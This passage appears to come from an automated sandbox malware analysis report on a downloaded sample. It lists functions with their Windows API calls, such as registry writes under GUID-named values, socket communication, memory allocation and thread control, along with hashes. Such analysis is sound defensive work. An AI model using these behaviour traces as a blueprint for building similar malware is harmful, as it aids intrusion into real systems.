                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 144976343-2564639436
                                                                                                            • Opcode ID: 3b8e4d0bcbb270fdbd2883dd6d1b8bd0ded5d3f8693d68d7360318514618e035
                                                                                                            • Instruction ID: 7b5524dec39819170da9082c5fab2749f4c27bf441ca639d0069b1b76b8da5d7
                                                                                                            • Opcode Fuzzy Hash: 3b8e4d0bcbb270fdbd2883dd6d1b8bd0ded5d3f8693d68d7360318514618e035
                                                                                                            • Instruction Fuzzy Hash: 094129B4A04209DFDB09CF94C888BAEBBB6FB48304F24C548E515AB390C774D985CF90
                                                                                                            Function 0030FE20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83stringmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                            • lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                            • __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0030FF04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath__snwprintf
                                                                                                            • String ID: %s\%s\
                                                                                                            • API String ID: 3447735180-2168696002
                                                                                                            • Opcode ID: 86630961ebc38eb3d9c3db888eda73f57d51d560c67e0a89b5bb09e2b203ed91
                                                                                                            • Instruction ID: c9eb3693756ca3ac81a4d37dcb59d4cf848c2ac3bb8f8e6e1391931c2afcd63b
                                                                                                            • Opcode Fuzzy Hash: 86630961ebc38eb3d9c3db888eda73f57d51d560c67e0a89b5bb09e2b203ed91
                                                                                                            • Instruction Fuzzy Hash: 0C3109B5D00209DFCB05CFA8D885AAEBBB9FF48300F108119E909AB350D734A945CFA4
                                                                                                            Function 00322030 Relevance: 15.3, APIs: 10, Instructions: 294stringnetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00322049
                                                                                                              • Part of subcall function 00322450: CoInitialize.OLE32(00000000), ref: 00322466
                                                                                                              • Part of subcall function 00322450: CoCreateGuid.COMBASE(c 2), ref: 00322478
                                                                                                              • Part of subcall function 00322450: StringFromGUID2.COMBASE(c 2,?,00000027), ref: 00322490
                                                                                                              • Part of subcall function 00322450: wsprintfA.USER32 ref: 003224AB
                                                                                                              • Part of subcall function 00322450: LocalAlloc.KERNEL32(00000040,00000068), ref: 003224B8
                                                                                                              • Part of subcall function 00322450: und_memcpy.LIBCMTD ref: 00322505
                                                                                                              • Part of subcall function 00322450: LocalFree.KERNEL32(00000000), ref: 00322511
                                                                                                              • Part of subcall function 00322450: CoUninitialize.COMBASE ref: 00322517
                                                                                                              • Part of subcall function 0031FFF0: socket.WS2_32(00000002,00000001,00000006), ref: 0031FFFF
                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000080,?,00000004), ref: 003220F0
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00322428
                                                                                                              • Part of subcall function 00320950: WSACreateEvent.WS2_32 ref: 003209B0
                                                                                                              • Part of subcall function 00322530: LocalAlloc.KERNEL32(00000040,00000318), ref: 00322540
                                                                                                              • Part of subcall function 00322530: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 00322558
                                                                                                              • Part of subcall function 00322530: LocalFree.KERNEL32(00000000), ref: 0032256B
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003223B3
                                                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000020), ref: 003223D8
                                                                                                            • und_memcpy.LIBCMTD ref: 003223F7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0032240E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0032241B
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00322437
                                                                                                            • closesocket.WS2_32(00000000), ref: 00322444
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                              • Part of subcall function 00320CD0: WSACreateEvent.WS2_32 ref: 00320D30
                                                                                                              • Part of subcall function 003226F0: LocalAlloc.KERNEL32(00000040,00000280), ref: 00322700
                                                                                                              • Part of subcall function 003226F0: lstrcpyW.KERNEL32(0000001C,CPU001), ref: 00322735
                                                                                                              • Part of subcall function 003226F0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00322754
                                                                                                              • Part of subcall function 003226F0: LocalFree.KERNEL32(00000020), ref: 00322762
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$CreateEvent$Alloc$InfoLocale___crtund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownsocketwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3642594451-0
                                                                                                            • Opcode ID: 111b3e3bec87ee5087346a4b60be2eb3699642973ae1e90a55b76a8c8c7f5703
                                                                                                            • Instruction ID: 65a207879d43e119cbd0a0946e29820014e85793e7c0d97634d6c96d6394d18c
                                                                                                            • Opcode Fuzzy Hash: 111b3e3bec87ee5087346a4b60be2eb3699642973ae1e90a55b76a8c8c7f5703
                                                                                                            • Instruction Fuzzy Hash: 31B120B5A00328BFEB25DB95DC45FEA7379AB48700F504198F608AB181E7716F84CF62
                                                                                                            Function 0030B3E0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61registrytimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030B3FF
                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0030B426
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0030B438
                                                                                                            • _memset.LIBCMT ref: 0030B446
                                                                                                            • GetSystemTime.KERNEL32(?), ref: 0030B465
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0030B476
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 0030B3EE
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 0030B3E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Time$System$CloseCreateFile__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}
                                                                                                            • API String ID: 3491885642-838102593
                                                                                                            • Opcode ID: 0e4b77501ff19165bbca2996be611d538e4c8c40e79a786d15a9f4aded5da7ee
                                                                                                            • Instruction ID: 5ca2206d87f601877a562b50c6b58950d476750f2264337e2c032c7e0408fd79
                                                                                                            • Opcode Fuzzy Hash: 0e4b77501ff19165bbca2996be611d538e4c8c40e79a786d15a9f4aded5da7ee
                                                                                                            • Instruction Fuzzy Hash: 20117771A54209B7EB21DBB0DC4AFFAB33CAB14704F500954BA099A1C2FBB59744C7A1
                                                                                                            Function 00304650 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00304670
                                                                                                            • __snwprintf.LIBCMT ref: 0030468E
                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,000017FC,00000000), ref: 003046B5
                                                                                                            • RegSetValueExW.ADVAPI32(000017FC,{108D3252-20F0-4C1B-940D-6ED5366D8FD3},00000000,00000003,003734D4,003045E8), ref: 003046D4
                                                                                                            • RegCloseKey.ADVAPI32(000017FC), ref: 003046E2
                                                                                                            • RegCloseKey.ADVAPI32(000017FC), ref: 003046F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateValue__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 749045061-2357458413
                                                                                                            • Opcode ID: 910730a494e00d6f6bbf54902c517a377eaff5b8b52bcd75b96900211cd16481
                                                                                                            • Instruction ID: d18dd3231795798b5580ccba3d4f4a77fa0d876be54d9f82edc98730dc2b65bb
                                                                                                            • Opcode Fuzzy Hash: 910730a494e00d6f6bbf54902c517a377eaff5b8b52bcd75b96900211cd16481
                                                                                                            • Instruction Fuzzy Hash: E911657574430CBBE735DBA4EC8AFAA737CAF48B00F104544BB08AA1C1F6B69B409795
                                                                                                            Function 00305090 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 55registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 003050B0
                                                                                                            • __snwprintf.LIBCMT ref: 003050CE
                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 003050F5
                                                                                                            • RegSetValueExW.ADVAPI32(?,{DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8},00000000,00000003,?,00000B3C), ref: 00305115
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00305123
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00305134
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateValue__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                                                                                                            • API String ID: 749045061-237943000
                                                                                                            • Opcode ID: a994145e69a306521a9a2548b6233c0a42e0b506f611dbe70b6d5c550e03d6b7
                                                                                                            • Instruction ID: 8c03256e85cb1729fc8a4dc986020c1f7912fd728203c495b7789d2519c8982c
                                                                                                            • Opcode Fuzzy Hash: a994145e69a306521a9a2548b6233c0a42e0b506f611dbe70b6d5c550e03d6b7
                                                                                                            • Instruction Fuzzy Hash: 36119675754308BBE735DBA0DC4AFAB737CAF54B00F504544B70CAA1C0E6B59B409B95
                                                                                                            Function 00306AC0 Relevance: 13.8, APIs: 9, Instructions: 253memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00306B42
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00306C3D
                                                                                                              • Part of subcall function 00320950: WSACreateEvent.WS2_32 ref: 003209B0
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00306C9A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00306DE6
                                                                                                              • Part of subcall function 00308A80: LocalFree.KERNEL32(00000000), ref: 00308AE0
                                                                                                              • Part of subcall function 00308A80: LocalFree.KERNEL32(00000000), ref: 00308AF0
                                                                                                              • Part of subcall function 00308A80: LocalAlloc.KERNEL32(00000040,00030010), ref: 00308B3B
                                                                                                              • Part of subcall function 00308A80: LocalAlloc.KERNEL32(00000040,00008AD0), ref: 00308B55
                                                                                                              • Part of subcall function 00308A80: _memmove.LIBCMT ref: 00308B76
                                                                                                              • Part of subcall function 00308A80: lstrcpyW.KERNEL32(00000000,00000000), ref: 00308B86
                                                                                                              • Part of subcall function 00308A80: lstrcpyW.KERNEL32(-00010000,00000000), ref: 00308B99
                                                                                                              • Part of subcall function 00308A80: lstrcpyW.KERNEL32(-00020000,00000000), ref: 00308BAD
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
                                                                                                              • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
                                                                                                              • Part of subcall function 00309400: LocalAlloc.KERNEL32(00000040,00306D26,?,00306D8A,00000000,00000000,?), ref: 00309416
                                                                                                              • Part of subcall function 00309400: _memmove.LIBCMT ref: 00309435
                                                                                                              • Part of subcall function 00309400: lstrcpyW.KERNEL32(?,00000000,00000000,00000000), ref: 003094FF
                                                                                                              • Part of subcall function 00309400: StrStrIW.SHLWAPI(?,.DLL), ref: 00309511
                                                                                                              • Part of subcall function 00309400: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 0030953C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00306DAD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00306DBA
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00306DFC
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 00306E68
                                                                                                            • closesocket.WS2_32(?), ref: 00306E72
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFree$lstrcpy$CreateInfoLocale___crt_memmovewnsprintf$EventFileclosesocketsetsockoptshutdown
                                                                                                            • String ID:
                                                                                                            • API String ID: 3185571019-0
                                                                                                            • Opcode ID: a3af209775b80945dad3c4c99e2f711aa1e6927f875085479f82f39564cda2cd
                                                                                                            • Instruction ID: b317bdfcad04be47a1b1338f5bd9ac7444a842a34740eab929ddd228006c08dd
                                                                                                            • Opcode Fuzzy Hash: a3af209775b80945dad3c4c99e2f711aa1e6927f875085479f82f39564cda2cd
                                                                                                            • Instruction Fuzzy Hash: 40B11EB5E00218AFEB25DB94CC56FEEB778BF48310F508198E619AB2C1D7715A84CF61
                                                                                                            Function 00317D60 Relevance: 13.7, APIs: 9, Instructions: 171stringmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$AllocLocal_memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 39496755-0
                                                                                                            • Opcode ID: 8b401cf64a9d3d1bebcc9615f3ec337204d4e4a0cb4e68a2c3eb75a69be47bd2
                                                                                                            • Instruction ID: b384228420c511827f6e27558f540865494f15a95be914e66ca8f20ed7d5dd99
                                                                                                            • Opcode Fuzzy Hash: 8b401cf64a9d3d1bebcc9615f3ec337204d4e4a0cb4e68a2c3eb75a69be47bd2
                                                                                                            • Instruction Fuzzy Hash: A971D874A0410ADFCF09CF98D981AEEB7B6FF4C304F248559E905AB241D734AE95DBA0
                                                                                                            Function 0031EBC0 Relevance: 13.7, APIs: 9, Instructions: 158memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0031EC09
                                                                                                            • und_memcpy.LIBCMTD ref: 0031EC2F
                                                                                                            • und_memcpy.LIBCMTD ref: 0031EC4A
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0031EC68
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031EC84
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocLocalund_memcpy$FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2616075706-0
                                                                                                            • Opcode ID: 169d6d1e7c7b262174ec19d761686e53a7ef3985edf953b47a7e57b9e4bf83d6
                                                                                                            • Instruction ID: 6eb5214b6f452ed3b3d8db613c0d295b7a309c0fd615f2f81710ee69614681ee
                                                                                                            • Opcode Fuzzy Hash: 169d6d1e7c7b262174ec19d761686e53a7ef3985edf953b47a7e57b9e4bf83d6
                                                                                                            • Instruction Fuzzy Hash: 2871D2B5A00228CBCB68CF54DC84BDDB7B5AF98305F1484D9E50DAB351DA31AEC58F40
                                                                                                            Function 0031C240 Relevance: 13.6, APIs: 9, Instructions: 95threadmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 0031C24A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0031C360,00000000,00000000,00000000), ref: 0031C291
                                                                                                            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 0031C2EB
                                                                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 0031C302
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031C311
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C31B
                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 0031C336
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031C340
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C34A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalThread$CloseFreeHandle$AllocCodeCreateExitMultipleObjectsTerminateWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 872497719-0
                                                                                                            • Opcode ID: 41ec70808b806e0bef5bb364e64e8a15a425dccdf746cbfe31f727b4487b94bb
                                                                                                            • Instruction ID: 72d60f9781e3816090f5bf187fc13d35ecb427ca92b1a47608f2bddbb3bede0c
